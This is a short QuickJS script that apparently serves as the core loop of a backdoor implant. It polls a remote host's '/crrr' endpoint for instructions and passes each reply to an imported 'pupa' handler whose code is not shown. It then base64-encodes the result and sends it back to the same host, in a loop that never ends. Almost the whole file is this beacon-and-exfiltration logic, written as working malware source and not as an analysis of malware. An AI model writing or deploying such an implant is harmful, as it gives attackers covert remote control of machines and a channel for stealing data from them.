import * as os from "os";
import * as std from "std";
import burrow from "./burrow";
import pupa from "./pupa";
import base64 from "./b64/b64.mjs";

let hole = burrow();

let tunnel = callback => {
  let aux = std.urlGet(hole.address + ":" + hole.port + "/crrr");
  aux ? callback(aux) : os.setTimeout(tunnel, 10000); 
};

for(;;) {
  tunnel( function(res) {
    let sendBack = true;
    let feedback = pupa(res);
//console.log("End pupa");
//console.log(`[DEBUG]${hole.address}:${hole.port}/${base64("e", feedback)}`);

    //console.log(feedback);
    feedback && sendBack ? std.urlGet(`${hole.address}:${hole.port}/base64:${base64("e", feedback)}`) : /*console.log(`Closing`)*/ 0;
  });
}

